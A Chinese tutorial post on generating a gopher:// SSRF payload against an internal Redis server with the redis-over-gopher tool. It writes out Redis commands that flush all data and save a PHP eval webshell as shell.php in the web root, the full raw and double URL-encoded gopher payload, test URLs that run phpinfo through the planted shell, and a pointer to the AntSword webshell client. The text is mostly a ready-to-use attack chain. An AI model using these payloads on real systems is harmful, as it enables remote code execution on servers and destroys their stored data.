如何使用python脚本生成redis格式的数据包

news2025/4/24 9:17:08

用python脚本生成redis格式的数据包

（1）使用下述网站下载开源的生成gopher协议规则的包的工具

https://github.com/firebroo/sec_tools/tree/master/redis-over-gopher

（2）首先要修改redis.cmd中的内容

flushall

config set dir /app

config set dbfilename shell.php

set 'webshell' '<?php eval($_REQUEST[6]);?>'

save

注意！！！！save后要回车换行

（3）编辑好后在cmd中运行

python redis-over-gopher.py

gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%34%0d%0a%2f%61%70%70%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%39%0d%0a%73%68%65%6c%6c%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%32%37%0d%0a%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%52%45%51%55%45%53%54%5b%36%5d%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

（4）进行url编码

%67%6f%70%68%65%72%3a%2f%2f%31%32%37%2e%30%2e%30%2e%31%3a%36%33%37%39%2f%5f%25%32

%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30%61%25%36%36%25%36

%63%25%37%35%25%37%33%25%36%38%25%36%31%25%36%63%25%36%63%25%30%64%25%30%61%25%32

%61%25%33%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36

%66%25%36%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30

%64%25%30%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%33%25%30

%64%25%30%61%25%36%34%25%36%39%25%37%32%25%30%64%25%30%61%25%32%34%25%33%34%25%30

%64%25%30%61%25%32%66%25%36%31%25%37%30%25%37%30%25%30%64%25%30%61%25%32%61%25%33

%34%25%30%64%25%30%61%25%32%34%25%33%36%25%30%64%25%30%61%25%36%33%25%36%66%25%36

%65%25%36%36%25%36%39%25%36%37%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30

%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%31%25%33%30%25%30

%64%25%30%61%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36

%31%25%36%64%25%36%35%25%30%64%25%30%61%25%32%34%25%33%39%25%30%64%25%30%61%25%37

%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30%25%30

%64%25%30%61%25%32%61%25%33%33%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30

%61%25%37%33%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%38%25%30%64%25%30

%61%25%37%37%25%36%35%25%36%32%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%30

%64%25%30%61%25%32%34%25%33%32%25%33%37%25%30%64%25%30%61%25%33%63%25%33%66%25%37

%30%25%36%38%25%37%30%25%32%30%25%36%35%25%37%36%25%36%31%25%36%63%25%32%38%25%32

%34%25%35%66%25%35%32%25%34%35%25%35%31%25%35%35%25%34%35%25%35%33%25%35%34%25%35

%62%25%33%36%25%35%64%25%32%39%25%33%62%25%33%66%25%33%65%25%30%64%25%30%61%25%32

%61%25%33%31%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%37%33%25%36

%31%25%37%36%25%36%35%25%30%64%25%30%61

（5）测试

当出现在传动时证明可执行

证明已经执行成功

192.168.251.133/shell.php

192.168.251.133/shell.php?6=phpinfo();

可以访问phpinfo则证明执行成功

（6）正确使用蚁剑

第一次打开这个进行初始化

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1345656.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！